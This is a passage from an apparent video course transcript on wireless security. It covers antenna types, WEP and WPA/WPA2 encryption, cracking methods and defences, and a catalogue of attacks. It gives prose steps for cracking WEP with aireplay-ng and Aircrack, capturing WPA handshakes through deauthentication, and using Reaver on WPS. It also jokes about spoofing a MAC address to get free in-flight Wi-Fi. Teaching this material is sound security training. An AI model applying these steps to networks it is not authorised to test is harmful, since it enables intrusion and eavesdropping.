antenna. You'll notice it's flat. Inside you have the same concept, as an omni-directional, they just
added something special. Now normally when you buy directional antennas you have the option of
buying them in various degrees. A 45, a 90, or 180 degree antenna. They're more powerful than omni-
directionals because of this reason. Let's say that this is a bird's eye view of the top of the antenna
inside of this particular antenna on the left. Well, we know that the signal will go out in a 360 degree
pattern. Well, instead if I take that antenna and encase it, all we have to do is put something in
there that's highly reflective. Remember we talked about reflection earlier? Most of the time, it's just
sheet metal. So, that sheet metal takes the signal that hits it, and what ends up happening is that when
that signal hits that sheet metal, it actually reflects it and pushes behind the signal that's already going
in that other direction and actually amplifies. It's actually kind of a cool concept when you think about
it. Something so simple. Now, think about that for a second. A lot of times I have students ask
me, "Dale, what's the best way to deploy a wireless "in a work environment?" Well, most of the time
IT guys will go through and say, "Okay, I want to find my centralized "location and I want to make sure
I get the "best signal, so I'm going to put it right smack "in the center and let it broadcast out "the
signal." That includes going all the way out to the parking lot, where an attacker might be sitting and
waiting. Or listening in. Instead, my own personal best practice is, is if my parking lot is on that north
side of the building, I'll actually place my wi-fi access point, in the corner. By the way, I'd also put my
access points up inside of a drop ceiling. Or try to hide them, so they can't be seen. So, when someone
is casing the joint,they don't know that there's an access point there. But up inside that plenum area, I
would actually put a couple pieces of sheet metal up there. So that, what you just learned, the signal's
going to get amplified and not overflow into the parking lot area. Obviously my signal's going to go
stronger in there or possibly even further to the bottom right hand corner and hopefully they don't
have a parking lot there. But again, if I'm worried about it, I might put some sheet metal down in that
corner as well. Or just build my whole building out of sheet metal. I believe we refer to those as army
barracks, right? We also have another type of antenna, that's called a parabolic grid. This is what they
look like. You may have seen these quite often.You have your transmitting element, in the center
there, and the grid portion is actually pushing as well as receiving, almost like a big satellite
dish. Receiving this signal and focusing it back to that center arm. These are more powerful than omni
antennas as well. They're typically used for long distances. Like 10 plus miles. Back in my day we
actually had, this was a 25 DB parabolic grid antenna, we also had smaller ones that were 15 and 5. To
give you a better visual representation of what the grid is doing. This is a chart for that particular
antenna. Showing you how the grid helps to focus or they call it, using directors,to make the angle
smaller. Therefore you get a higher amplification or a higher gain out of it. Another type of antenna
that you might see out there is called a yagi. This is what the yagi looks like. This is used for extremely
focused connectivity. You can not be, with a parabolic antenna you can be within a couple of
degrees and pick up the signal but with a yagi, man you got to be smack dead on. Again, huge distances
for these particular types of antennas. What happens here, or the mechanics of a yagi, is this. The
reason why they look so weird is that first of all you have what they refer to as the driven element. This
is where the microwave signal comes up off the access point and starts to get pushed out onto the
yagi. This back pole here,this is referred to as the reflector. Just like what we saw in the parabolic
grid antenna. It's designed to push the signal back forward. The reason why the bars up front are
smaller, these are referred to as directors, is because it helps to focus that microwave wave. Can I say
that? Microwave, wave. I'll just shorten it up. It's there to focus that microwave so that it takes a
smaller pattern and therefore it's able to go longer distances and possibly pop more popcorn. You
think I'm kidding, so a real world story here. When I had my ISP and we were up on top of that really
tall water tower, have I told you how much I hated that thing? I was actually up there once during a
fog and ice storm. So, I'm on top of the tower, it is so cold that the fog is turning to ice on the hand
rails and its dark. So, I can't see beyond the top of the water tower. I can't see my assistant down on
the ground. When it got cold like that, first of all, getting back down was really fun, it was the thrill of
my life. But when it was winter and anytime it was cold if your hands got cold up there, or if your
gloves got wet, you could just simply place them in front of the antenna and you'd get warm. (funny
voice) Dale, that sounds dangerous. (normal voice) It really isn't becauseeven though it is a microwave
technology you have to think we're surrounded by this stuff and it's such a low frequency, it's not like
putting your hands in a microwave oven. If it was, I would have taken a turkey up there with me and
cooked a little dinner while I was up there.

Summary

So, in this module, man we talked about a lot of stuff. We first started off with talking about new terms
to learn. We talked about BSSID. We talked about frequency hopping. Famous Hollywood starlet, Hedy
Lemarr, who helped invent wi-fi or the spread spectrum technology. We talked about DSS and what a
SSID was. We then talked about the advantages and disadvantages of wi-fi. Cost savings,
absolutely. Well, unless you're buying a ton of new equipment but even the man hours to run
wiring can be a real pain the the cahootski. Again the disadvantages of beam security is our top
priority, as well as bandwidth. We then went through and took a look at different types of wi-fi
networks. Remember we had extensions for networks? We also had lan to lan networks. Multiple
access point networks and then of course the cellular access networks.After that, we talked about wi-
fi standards. In that we discussed line of sight theory as well as the fresnel zone. We also talked about
some of the standards, we showed you the graph of the different 802.11 standards. Their speeds and
their frequencies.We then went through and talked about the wi-fi authentication modes. Being both
open and shared. Even though open sounds less secure. Shared key is actually less secure because of
the key is transmitted. We then went through and talked about chalking. How attackers use a simple
low tech device, like a piece of chalk to leave behind identification markings to help other
attackers know what's near by. Again this is kind of being deprecated because most of this now is
tracked with online services through the sharing of digital information. We then went through and
took a look at the different antenna types. Remember we had omni-directional, that gives us 360
degrees of coverage not very far distances. We also talked about horizontal and vertically polarized
antennas. As well as yagi, sector based antennas. And parabolic grid antennas. So, now that we've got
the foundation for wireless, in the next module, we're going to talk about encryption.

Encryption in Wireless

Encryption in Wireless

The yellow duck has a blue umbrella. You guys don't know that code? I don't understand why you
wouldn't. Oh, 'cause it's encrypted. You'll never guess what we're going to talk about in this
module. Yeah, it's how to encrypt wireless. So we've gone through and we've deployed our wireless
environment. How do we make sure the things are still secure? Well, just like all my other modules I
need to start off with a quote, and this quote is a very famous quote by a very famous Pluralsight
author. I believe he goes by the name of SuperDale, and he said, oh wait, my message is
encrypted. Here, let me decrypt that for you.This is actually a saying that I've come up with and I use
it quite often. That is: "Once we've identified our weakness, "we'll have strength and that's when we
get dangerous!" And that is so true. Again, I talk about this all the time that knowing is, quote, G.I. Joe
again, knowing is half the battle and understanding what your weaknesses are helps to strengthen
you. So in this module we're going to go through and take a look at some basics when it comes to
wireless encryption. If you want to get deeper, I recommend some other Pluralsight courses on
cryptography that would help you out. But we'll start off by first taking a look at an encryption method
that, hopefully, you're not using but it was better than nothing, it was called WEP. Then we'll go
through and take a look at what we refer to as WPA and WPA2 encryption. And since this course is
about protecting wireless we'll look at how we can break the encryption. And then, if you know me, I
don't like to leave you hanging, we'll actually go through and look at defending against the cracking of
Wi-Fi networks. So, break out your Little Annie Orphan decoder rings because I'm going to start getting
into encryption (slurred speech) (slurred speech) is just really smart. Oh, obviously, you didn't
have your encryption ring on yet, huh?

WEP Encryption

So let's talk about WEP encryption. Believe it or not, WEP encryption is still heavily used, but let's not
even pretend here. WEP does stand for Wired Equivalent Privacy, but, it's not. But initially that was its
goal. And we'll talk about why they didn't achieve that goal when they implemented this or when this
got ratified. But it was designed to also protect us from eavesdropping. No, I'm not talking about
somebody looking over your shoulder, but digital eavesdropping. It was designed to help us make
sure that our data was protected. It also was there to help us to make sure that we prevented anybody
from getting on the network via Wi-Fi without being authorized to do so. And in order to prevent
unauthorized access and eavesdropping, it uses a key, and the key is the key. That's the problem, is
that the key is used to encrypt the packets before transmission, but this key is shared, which makes it
kind of a nightmare for us. So what's the goal? Well, the goal for WEP was, again, to control access, as
well as make sure that we can maintain confidentiality. This is what actually would help preventfrom
layered link eavesdropping, or that digital eavesdropping that we talked about earlier. Its other goal
was for data integrity, making sure that nobody changed the data during transmission. And it was
supposed to bring us a level of efficiency. Anytime you start implementing encryption, you have a
tendency of slowing down the process or the data being transmitted. So, the goal here was to make it
somewhat streamline. Dale, so what happened? Well, this is what happened. First of all, when they
came up with WEP, it was not reviewed by any academia, or any type of public review for any type of
input.No were any cryptologists able to review this technology. Back in the day we were so
desperate to get some type of encryption, there was almost like somebody threw something
together thinking that it was going to work. As I mentioned before, one of its biggest downfalls is the
pre-shared key issue. Back in 1999 is when it got ratified and the first version of WEP weren't really
that strong. And one of the reasons why it wasn't that strong was because the issue that we had with
US restrictions on the export of various cryptography technologies actually led a bunch of
manufacturers restricting their devices to only 64 bit encryption. But WEP only used a 40 bit key. When
the restrictions were lifted, it was increased 120 bit, but again, WEP ended up only 104 bit key size. And
even though they came out with 256 bit WEP encryption, which only uses its 232 bit key size, 120 bit
still remains one of the most common implementations today. And the other issue has to do with the
fact that WEP used RC4 algorithm for its encryption. The problem is that RC4 is designed for
randomized keys to be encrypted, but WEP isn't random at all. You create one shared key and it's the
same for everybody. The end result is that WEP can be cracked if enough traffic can be intercepted. So,
as the passphrase grows or somebody increases it, the time that it takes to crack it grows
linearly. When it grows exponentially, it causes a key that's 41 bits in length to take twice as long as a
40 bit key. With WEP you would need to increase the key size from 40 to 80 bits just to double what
it takes to find the key.So, technically this means that 104 bit WEP key provided no significant practical
advantage over 40 bit key. Now, I'm not here to say that WEP is totally garbage. I would much rather
use WEP than nothing at all. But please, if you're using it anywhere, turn it off. Or if you're not going
to turn it off, let me know the address of your access point. I think I'd like to come visit you.

WPA & WPA2 Encryption

So let's start with WPA. WPA is kind of like WEP all grown up. Who put on his big boy pants? Well, that
was what it's designed to do. It's short for a Wi-Fi Protected Access and it definitely gives better
protection than what we experienced with WEP, and it was formally adopted back in 2003, which was
about a year before WEP was officially retired. So it was designed to patch the issues that we had with
WEP. Now, the most common WPA configuration is using WPA PSK That's short for pre-shared
key, and this key is 256 bit which is much stronger than the 64 bit and 128 bit keys that we saw with
WEP. Now, one of the biggest changes of implementing WPA included a message integrity check, and
what we mean by that in non-geek terms is the ability to check to see if an attacker or somebody had
captured or altered the packets as it was passing from the access point to the client. And we do that
with something called Temporal Key Integrity Protocol, also known as TKIP. Er, Dale, what's TKIP? Well,
under TKIP a client starts with 120 bit temporal key that is then combined with the client's Mac
address. Once the TKIP has been created, it wraps itself around WEP because that's all WPA is, is fixing
WEP. And then, unique encryption keys are then created for each wireless frame which creates a more
secure network connection. However, despite the improvement the WPA gives us over WEP, the ghost
of Christmas past, no, the ghost of WEP still haunts WPA. Now, the really cool thing about WPA back
in the day is that it didn't require you to go often by new hardware. It was simply a firmware upgrade
on the networking devices, but here is the downside to it. Because it had to recycle certain elements
used in WEP, it actually ended up creating exploits. In fact, today WPA by itself is not considered
secure, just like W-E-P, or WEP. So then along came our big brother, WPA2. WPA2 created much
stronger protection for us. And one of the reasons for this was the mandatory use of AES algorithms
and something called CCMP, or Counter Cipher Mode and Block Chaining Message Authentication
Code Protocol.Yeah, nothing in your immediate future on that one. It was just a new algorithm that
replaced TKIP. Now, WPA comes in two different flavors. The first one is referred to as WPA-
Personal. It uses a pre-shared key. It does use a 256 bit key for encryption.And then encryption is
based off of anywhere from 8 to 63 ASCII Characters. You all have probably set up an access point
before where you've gone through and you've created a passcode, or a passphrase for your wireless
network. Well, it's those characters that are used to help create that 256 bit key. Well, gee, Dale, it
sounds like if I'm using WPA2, I'm doing pretty good. Yeah, guess again. Some of the
vulnerabilities that were the big hole in WPA armor exist with WPA2, and here it is. And if you're guys
on your Wi-Fi routers you're using WPS. Dale, that's too many acronyms, I can't keep record of all of
them. WPS is that Wi-Fi Protected Setup. It's that little button. All you got to do is hit this button and
you'll get your device to hook right up. Well, WPS is burned into the firmware. It doesn't change or
rotate, it's a code. Now I could still try to break into your WPA2 network by using brute-force attacks
and that could take anywhere from several hours to a couple of days, maybe even a week. But if I go
after you, WPS, this vulnerability can be hacked by some softwork called Reaver, and I can crack that
anywhere from two to 14 hours, depending on my system. So, if you can, try to disable WPS. The other
flavor of WPA2 is referred to as WPA2-Enterprise. Now, WPA2-Enterprise addresses the
concerns regarding the distribution and managing of those static passphrases. It's actually the control
access on a per account basis by tying into some type of authentication service. Those are typically
handled by either EAP or RADIUS, and this mode requires credentials, such as a user's name, a
certificate, maybe a one-time password, and the authentication occurs between the station and this
centralized authenticating server. The access point or the wireless controller simply monitors the
connection and directs the authentication packets to the authentication server. Typically, this is going
to be a RADIUS box. Now, this is all based off of the enterprise environmentusing AES with CCMP,
which is extremely strong compared to RC4. Now, to show you what this looks like, let's take a look at
the workings of 802.1x. This framework supports both user and machine authentication with port
based controls that worksfor both wired switches and wireless access points. Now, the major
components involved in this are the supplicant, which would be the devices we're trying to gain access,
with the authenticator which is typically an access point. But if you're using a centralized access point
architecture, it could be on a switch or a controller, and this is in charge of authenticating the clientto
the network. And the other component is the authentication server. Now, it can't be just any
authentication server, it has to be an authentication server that supports EAP, or I should it's
compatible with EAP, and it has to be the EAP that comes on the supplicants. Now, typically the
authenticator processes requests from the supplicant and leaves the interface blockedunless it's
directed by the authentication server to let it through, and the authentication server receives and
processes authentication requests that it gets from the authenticator, the access point, using a
somewhat extensive process. So, in this case, when the access point receives EAP traffic from the
client, it converts it and sends it to the RADIUS server. After the authentication process starts, the
client receives what we refer to as a master key, or an MK. Now, the master key is tied to that
authentication session. Now, since both the authentication server and the supplicant have the master
key, they both generate what we refer to as a primary master key, or a PMK. Now, the access point
receives a PMK from the authentication server through some RADIUS attributes that you would
assign. Once the client and the access point have the PMK, the client and the access point generate
something known as a pair-wise transient key. And the reason why they both generat it is because we
don't want to exchange it across the Wi-Fi, which eliminates a man-in-the-middle attack. Now,
because the process of a client authenticating to a RADIUS server can take hundreds of
milliseconds, not seconds, milliseconds, but believe it or not, it's long enough that a device, like a
phone or a laptop, it's unacceptable. So, most enterprise wireless products that have 802.11i features
have things built into them, like PMK caching, as well as pre-authentication. So you can see that there's
a lot of keys involved with this interaction. So much so that you may have to involve Vinz Clortho,
Keymaster of Gozer. Anybody? Anybody? Okay, homework assignment: go watch Ghostbusters.

Breaking Encryption

So, if things are encrypted, how do we break that encryption? Well, that's going to depend again on
the type of encryption that you're using. When it comes to WEP, one of the biggest issues that we
have is the feeble initialization vectors that are up there, or IVs. And there's got to be a hospital joke
there somewhere, right? IVs? No? Okay. So let's talk about some of the weak initialization vectors that
WEP has. First, the fact that it uses RC4. Now, RC4 itself isn't weak, it's how WEP uses RC4,and how it
utilizes it is it uses a key scheduling algorithm, or a KSA, to create the initialization vector, and that is
actually added to the base key. And unfortunately, the first few bits are clear text, so yeah, it becomes
very easy to predict what the initialization vectors are going to be. Therefore, if I intercept enough
traffic with WEP, I'll be able to figure out what your key is.The other issue is that the initialization
vectors aren't explicit, so they're reused over and over and over on your devices. So if you get one key,
you have everything, kind of like one ring to rule them all. Another weakness in the IV is that the IV
itself is appended to the beginning of the security key, which makes it vulnerable to what we refer
to as FMS attacks. And the acronym stood for the last name of the three gentlemen that came up with
the paper, I believe they work for Cisco, back in 2001. But it takes advantage of the weaknesses in the
RC4 key scheduling algorithm to go through and reconstruct the messages to determine what the key
is and we do this with simple scripts. It's so simple, in fact, a lot of the tools that we use for hacking
wireless networks, like Aircrack and Airsnort, actually have the ability to exploit this type of
weakness. Another weakness in the initialization vector is the fact that there's really no way to
detect that the message has been tampered with.Now, there might be some other methods, such as
check some values that can look at the message integrity, but they have their own drawbacks as
well. And probably one of the most critical weaknesses is the use of what we refer to as short
initialization vectors. So basically, within a few hours of traffic, in fact, nowadays I can actually simulate
the traffic to speed the time frame up, the same IV will repeat itself and I can see those repeats using
sniffing tools, capture the encrypted packets with the same key, and then again use a tool, like Aircrack
and/or Web crack, to decrypt the weak IV. Which would then, obviously, give me the base key, and
again, the base key is the base key for everyone. So, knowing that these initialization vectors exist, it's
very easy to crack WEP. There're several tools out there, but they all basically do the same thing. You'll
first want to make sure that you start up the wireless interface in what we refer to as "monitor"
mode on a specific access point channel. Once we do that, we need to then check to see if the access
point allows for the injection of packets. If it does, I'm then going to use a tool, such as aireplay-ng, to
do a fake authentication with the access point. And I'll use a source Mac address that's already
associated with the AP, and I'll get that through sniffing, so that the AP accepts the packets. Now, any
type of injection is actually going to fail at this point, because even though the Mac address is
associated, even though the Mac address that I've listed is associated, my Mac address has not
associated with the AP. So I'll end up starting up a sniffing program and grab as many IVs as I possibly
can. Well, at least enough to break the base key. So, in order for me to get a hold of a bunch of IVs in
a short period of time, I'm just going to turn on aireplay-ng again into what we refer to as ARP request
replay mode which listens for ARP requests and then reinjects them back into the network. The access
point usually rebroadcasts the packets generating new IVs. Meanwhile I'm collecting those and then I
take them in, start cracking the IVs, using Cain&Abel or, again, the tool that you've seen being used
quite a bit here is aireplay-ng, just whichever one you're more comfortable with. Now, because WPA
is basically a grown up version of WEP, it does make it a little bit tougher but we can still brute-force
attack it, if I'm able to capture enough packets. And if you're not familiar with a brute-force attack, I
highly recommend going back and watching the ethical hacking course on hacking the system. Same
thing with doing an offline attack. In order to implement this, we have to be near the access point only
for a matter of seconds in order for us to capture the WPA and the WPA2 authentication
handshake. By capturing the right amount number of packets we can then try to crack this offline. And
if you remember from our course on offline attacks, that's the biggest advantage that an attacker has,
is time.I don't have to sit there and be on your network consistently. And if you want to get really
tricky, we do something called a de-authentication attack, and this is where I go "Dang!" Because what
this does is I'll go through and find an active client and I'm going to force the client off or to disconnect
from the access point. Then I'm going to use some of my cool tools to capture the authentication
packet, when the client tries to rehook up to the access point, which not only happens just within a
few seconds of it being disconnected. That authentication packet includes, remember, our pair-wise
master key, the PMK, which I can then brute-force or dictionary attack to recover the WPA key. And
just like WEP, we can brute-force the WPA keys. So the tools that we utilize for this process include
things like Aircrack, Kismac, and Reaver. If you remember, Reaver is actually used to grab the WPS, but
that's only if you have an RSVP with a PDQ. Okay? Yeah, I got you with acronyms, didn't I?

Defending Against Cracking

Okay, Dale, so what you're saying is we should just never use Wi-Fi. Well, no, that's not really what I'm
saying. Because we can do some things to defend ourselves against cracking on wireless. Again, I go
back to the same statement I made in understanding ethical hacking and that is, there's nothing that
is completely secure, but knowing what your risks are helps youto make you stronger or safer. I mean
I have a really high chance of being killed in a car accident if I drive, but that doesn't mean I'm going
to stop driving. I know what my risks are and, therefore, I'm going to do things like wear my safety
belt. I'm going to drive defensively. But Dale, I'm really scared. I know, I know. But let's talk about how
implementing some very basic things that we should already be doing, but people just have this
tendency of overlooking them, can actually help you in securing down your wireless network. The first
thing would obviously be our passphrases. We've talked about those passphrases, or sometimes we
refer to them as the PMK. If you make the passphrases in WPA complicated, make them not only
complicated but also, remember, we go back to talking about the length of our passwords? Get a
passphrase in therethat's at least 20 characters long, if not longer and do me a favor. And remember,
when creating these passphrases follow the same guidelines that we had with passwords. Don't use
real words that could be found in a dictionary. And then, in enterprise environment I would actually
look at the process of changing the passphrases at least once a year. Another option that you can do
is look at some of the additional controls that are provided to us already. Are you using a VPN? What
about NAP? For those of you guys who are not familiar with NAP, it's the Network Access
Protection. Microsoft has their own version that gives me additional control over end-user
connectivity. So think kind of outside the box. And then lastly, look at the client settings. Use WPA2
with EAS and CCM encryption only. Also, when it comes to the client settings, for the validation server
make sure you use a specific server address. I know that sometimes we try to take shortcuts or use
automation by saying, hey, take the next available authentication server. Well, don't do that 'cause
you're just asking for someone to fire up an evil twin.Oh, evil twin. We'll talk about that in another
module coming up here. Mwa ha ha ha ha!

Summary

So, in this module, we went through and took a look at several things. First, we talked about WEP
encryption. How it's not necessarily the best solution, it was a solution, but it has a ton of
issues. Maybe it needs to get some therapy. Well, actually there was some therapy, and that was
WPA. It was created to help fix some of the problems with WEP. But we also discussed that, because
it inherited some of the WEP features, it still was susceptible to wireless attacks. And also when it
comes to WPA2. Remember, there's both personal and enterprise. Personal can still be
hacked. Enterprise editions can also be hackedbut that's a lot more difficult. And if you remember,
with WPA2-Enterprise we used a third party, if you will, or a different device that did the
authentication for us, something like RADIUS server. We also then went through and talked about how
we can break the encryption. We looked at the IVs, or the initialization vectors, and how weak ones
make it easier for us to crack things like WEP. We also talked about as far as WPA is concerned, that
it's still susceptible to things like offline attacks, or the infamous de-authentication attack, as well as
the good old standard brute-force attack on WPA keys. Then we went through and we looked at how
we can defend ourselves against cracking. Again, just using some technologies and features that we
already have in place, or possibly in place, plus just implementing things that we should be
doing: longer passphrases,passphrases that aren't made up of actual words. Now we've got a whole
chapter coming up agains countermeasures for wireless hacking. This was just kind of a brief
overview as far as defeating against it. So, in the next module, we're going to talk about the threats, or
the vectors that we end up opening up because of wireless.

Threats from Wireless

Threats from Wireless

So what are the threats from wireless? Again, it's a great technology or great media. Is it really a media
if it's wireless? Eh, that's beside the point. But the aspect is, at least in this course, is, how do we
evaluate the threats or the possibility of threatsthat we expose our networks to? So here comes
another one of my famous quotes. This one may have been said while under the influence by Eddie
"The Man" Van Halen. He said, "Wireless is wireless and it's digital. "When digital first started, I swear
I could "hear the gap between ones and zeros." Yeah, sure you could, Eddy. You just keep playing that
guitar for me, would ya?So in this module, we're going to go through and take a look at the fact that
you're going to have lots of issues. Some of those issues are going to include the different types of
attacks that can be made against your environment. And we'll go through and look at integrity
attacks, confidentiality attacks, availability attacks, and authentication attacks. We'll then go through
and look at another vector, which is the attack on the access point. And that's going to include things
such as rogue AP attacks, unauthorized associations, HoneySpot, I did not misspell that, a lot of you
guys may be thinking honey pot, nope, it's called a HoneySpot AP attack. And we'll also look at some
AP MAC spoofing. The other vector would include attacks on the client.And those are going to include
things such as a denial of service attack on the client as well as ad-hoc attacks, and we'll get our
jammin' on. So let's jump into this.

Types of Attacks

So let's look at some of the integrity attacks that you could be a victim of. They can be summed up in
several different categories. But the first one we want to talk about is referred to as a data frame
injection. This is where we go through and we construct and send out forged wireless frames on the
network. Another type is referred to as a data replay attack. This is the concept of capturing wireless
data frames and then being able to modify them offline and replay them later. We also have WEP
injection, which, if you've been around wireless at all, you probably understand what this is, but
basically we construct and, again, distribute forged WEP encryption keys. Another type of attack is
referred to as an IV replay attack. Now, I couldn't come up with any icon when I searched for IV except
for a medical icon. So hopefully, you'll bear with me on that one. But this type of attack is
implemented by deriving the key stream by sending plaintext messages. Since the IV, remember that's
shortfor initialization vector, is transmitted with the packet in plaintext, weak IVs are very easy to
detect. And, given enough time and traffic, we can actually recover the entire key. Another type of
attack is called a bit-flipping attack. Now this is where the attacker sniffs a frame on the wireless
network. The attacker transmits the modified frame. The access point accepts the modified frame. But
the destination receiver, when it goes to decapsulate the frame, the checksum fails, and the receiver
generates a predictable ICMP error. The attacker just simply sniffs the network LAN looking for the
encryption error, and upon receiving the message of the error, the attacker is able to derive the key
stream, which is the same thing we do with the IV replay attack. Another type of attack is the EAP
replay attack. This is where we go through and capture packets during the EAP authentication
process and just simply inject it back into the network to gain access. It's kind of the same
concept when it comes to a RADIUS replay. This is where we go through and capture the
communication channel between the access pointand the authentication server. Remember we talked
about RADIUS servers? We can later replay that interaction to see if we can gain access. And, believe
it or not, there are actually what they refer to as wireless network viruses. Now these aren't viruses
that target computers and nodes, it actually targets access points. One of the most popular ones is
called Chameleon,which, when it attacks an AP, it doesn't affect how it works, but instead it's able to
collect and report credentials of all other Wi-Fi users who are connected to it. And if it finds, after it
was done, or if it found a roadblock that it couldn't access that information, the virus actually sought
out, are you ready for this one, other Wi-Fi access points that it could connect to and affect. So your
neighbor's access point could actually infect your access point. As far as confidentiality attacks are
concerned,Wi-Fi opens up to several of these. One of them being, obviously, HoneyPot APs. This is
just simply where an access point SSID is set up to be the same as a legitimate access point. There's
also session hijacking. This is again very similar to what we see with the wired network, but it's where
we manipulate the network so that the attacker's host appears to be the desired destination. Also,
obviously, traffic analysis. This can tell us quite a bit about the network infrastructure. Also,
eavesdropping.This is, again, where we're just going to capture and look at traffic to see if we can
obtain any type of potentially sensitive information. Masquerading is another one. This is where you
put on a costume and you run around the office, uh, no, never mind (laughing). This is actually where
you pretend to be an authorized user to gain access to a system. We also have the man-in-the-middle
attack. Again, this is simply just a network, but instead of wires, we use wireless. If you're not familiar
with the concept of man-in-the-middle, I recommend going back and watching our Sniffing
course. Another confidentiality attack would be, obviously, cracking WEP. Again, just by capturing data
we try to recover the WEP key, using either brute force or an FMS cryptanalysis. And of course,
probably the most notorious is the evil twin access point. Yes, evil twin. (imitating an old-time movie
villain) This is where you basically pose as an authorized access point by using the same SSID and,
hopefully, users hook into your access point mistakenly. Now we also have availability
attacks. Obviously if someone steals your access pointyou're going to have a problem with
availability, as well as any type of denial-of-service attack. If I go through and send forged
authentications or associations from random MACs, I'm going to end up doing an authorization
flood. Another type of availability attack would be a disassociation attack. This is where we basically
go and just totally destroy the connection between the client and the access point and make the access
point totally unavailable. Another type would be a de-authentication flood. This is where we flood
clients instead of the access point with forged de-authentication or de-association to disconnect them
from the access point. Another type is ARP poisoning. Again, this is exactly the same thingthat we do
on the wired network. It's also one of our first steps in performing the man-in-the-middle attack. We
also have routing attacks. This is where we goof up the routing tables or maybe even try to poison the
routes and distribute that information throughout the network via the access point. We also have
EAP-Failures. In this case, we look at valid 802.1X EAP exchanges and then send the client a forged
EAP-Failure message. And, again, they would disassociate. We also have what they refer to as the
tricky power-saving attack. This attack is just basically tricking the access point into believing that the
client is in Sleep mode. Another type is beacon flooding. Now what the attacker does here is, in order
to take away the availability of the access point, is they go through and generate hundreds and
hundreds of thousands of counterfeit 802.11 beacons and distributes those in the air, and it makes it
harder for the client to find a legitimate access point. And finally we have the TKIP MIC exploit. This is
basically where we go through as an attacker and generate a bunch of TKIP data that exceeds the
target's MIC-error threshold. MIC is short for message integrity check. And by exceeding that
threshold we actually shut down the access point. We also have authentication attacks. These type of
attacks allow us to do things like steal the identity of the person logging in, as well as possibly going
through and cracking either PSK as well as possibly also cracking VPN login information. And while
we're talking about cracking, we might as well look at cracking domain login credentials. Most of these
are going to be done with brute force attacks, or possibly using some type of dictionary tool. We also
have something called password assumption where the attacker just goes through and by capturing
identities, he just continually attempts using 802.1X authentication to try to guess the user's
password. And one of my favorites is obviously the app login theft. This is where we capture users'
credentials from cleartext application protocols. Oh, you know, 'cause everybody uses different
passwords for different apps, right? Nah, typically we use the same password for the app as we do as
our login credentials as well as to gain access to our wireless network. You didn't think about that one,
did you?

Attack on the AP

So let's talk about some of the attacks on the APs, or the access points. The first and most common
one that we see is a rogue access point attack. I'm going rogue! (laughing) Now what this is is, here
we have an office building with multiple floors, and we all have systems that are set up on the different
floors for different departments, and maybe we have multiple access points. And all of our
computers are hooked into those access points. Rogue access point is simply a device that isn't
sanctioned by an administrator but is actually operating on the network anyways. Sometimes these
rogue access points are deployed by employees who just want better reception. But from the
attacker's perspective, he sets up a rogue access point and places it near the target network. When
the user turns their computer on, the rogue access point offers up a connectionto the user's wireless
NIC. If the user connects to the rogue access point as the legitimate AP, it's going to try to go
throughand authenticate itself, and therefore the rogue access point picks up that whole
communication channel. Now another type is called an unauthorized association. How this is achieved
is, well we typically see this, like, on laptops. If the attacker's able to compromise a product or
device like a laptop, most of these devices have wireless built into them, but they may also be
hardwired into the network as well. The attacker installs what we refer to as a soft access point, which
is an access point program that runs via software and turns the laptop into an access point. Now if
he's successful, other machines might hook into that access point, and he'd be able to capture that
information. Now we also have something called HoneySpot AP attacks. So, we've all had our laptops,
we've traveled around, and as we visit different locations, like retail locations, they have their standard
access points being distributed, or their SSIDs. So, for example, if I go to McDonald's or Starbucks, a
lot of my hotels I stay with, use AT&T, and so we see these SSIDs including the defaults, dlink, netgear,
right? Everybody follow me so far? And, as we travel, we just take our laptops and we hook right
in. Well here's the dilemma, is that that information is stored on your laptop, so the next time you
come near an access point that's called Hilton or linksys or dlink, it'll try to connect automatically. So
when I return to the hotel, I'm good. Or when I return to Starbucks, I'm good. Do you see where I'm
going with this one? So, on a HoneySpot, this is where the attacker goes through and creates an access
point that has the same type of SSIDs as some of these retail locations. And because the signal may
be stronger because I'm sitting next to you, you're going to actually associate to me. Duh, duh,
duuhhh. Tell you what, let me show you something here real fast. I'm going to switch out to my laptop
so you can see this. So here I've remoted into my laptop. And this is my laptop that I travel with. And
I haven't done this in a while, so I may be the shoe repairman whose kids have no shoes, meaning I
don't think I've lately gone through and done what I'm about to teach you to do. But that's ok. It's a
learning for all of us. So you can see here that I'm hooked up to my own network. In this case here, it's
called BanburyG. I'm going to select here to manage my known networks.These are networks that I'm
used to seeing or that I've been connected to. And you can see several of them in here. One of them
being, hey, there's AT&T Wi-Fi. What I'd want to do is, I'd actually want to forget that access
point. Here's Courtyard, when I was at the Marriott. Some of these are companies that I go to all the
time, so I stay connected to 'em. Boingo. This is from flying on Southwest, or, excuse me, that was
Delta I believe. Netgear. This would be a connection that I made, I don't know why I made that one, so
I'm going to forget that one. This one down here, the GrayPeakWireless, this is a training center, one
of their network rooms. Here's the Washington Dulles WiFi. Want to forget that one. Let me back up
here. And this is more of a Windows TIN issue, But one of the things you want to make sure you do is
connect or take this option, "Connect to suggested open hotspots", yeah, let's turn that off. I don't
connect up to anything unless I know what it is I'm doing. Now, how you should connect up when
you're traveling is, I'm going to select to show available networks. And you would see these listed over
here. When you would want to go through and hook into one of them, Aquaman is my neighbor, so
I'm going to select to connect. Make sure you disable this "Connect automatically". This will let you
hook in, but then in future connections it won't hook back in. GDL thinks that's a helpful hint. I know,
anything I can do to make your life easier and safer. So there's another one out there that's
called access point, or AP, MAC spoofing. I'm sure you can figure out what this is. We've got our
network infrastructure. We've got our wireless systems running. The attacker just simply comes in and
spoofs the MAC address of an access point in hopes that somebody hooks up to him. Now let's
see. When would this also come into play?Let's say that you're on a transportation device that flies
through the air. And they happen to provide wireless internet on your transportation device. And most
of these are a paid service. And a legitimate user might actually log in with their laptop, and most of
the access is controlled by MAC addresses. And so, therefore, the access point says, "Uh yep, "I allow
this particular MAC address onto the network." And so somebody who may be curious, not saying I
may or may not have done this before,(laughing) but an attacker could go through and simply
duplicate the MAC and be allowed access to the network. I know what you're all thinking. You're
thinking, "I'd better look to see if Dale's on my flight."

Attack on the Client

So let's talk about the attacks on clients. These are really simple. And we start off with the most basic
one, which is, obviously, a denial-of-service. Under normal circumstances, we have our systems that
are hooked up to our Wi-Fi access points. And to just totally jack up a network infrastructure, so the
attacker might actually send a packet that's called a de-authentication packet to the node, which
basically shuts off its wireless. It is no longer associated to the access point. Very, very simple
attack. Another type is referred to as an ad-hoc attack. Now a lot of devices, like laptops, have both
Wi-Fi and ethernet cabling built in to them. And so a user comes in and they click in for, you
know, better communication on the network, they click into their RJ45 connection. Well, in an ad-hoc
attack, ad-hoc means a one-to-one relationship. So the attacker simply comes in and creates an ad-
hoc connection to your laptop and then is able to pass through and gain access to the network.So,
Super Dale rule number 583, turn off your Wi-Fi if you're hooked in through ethernet. Another type
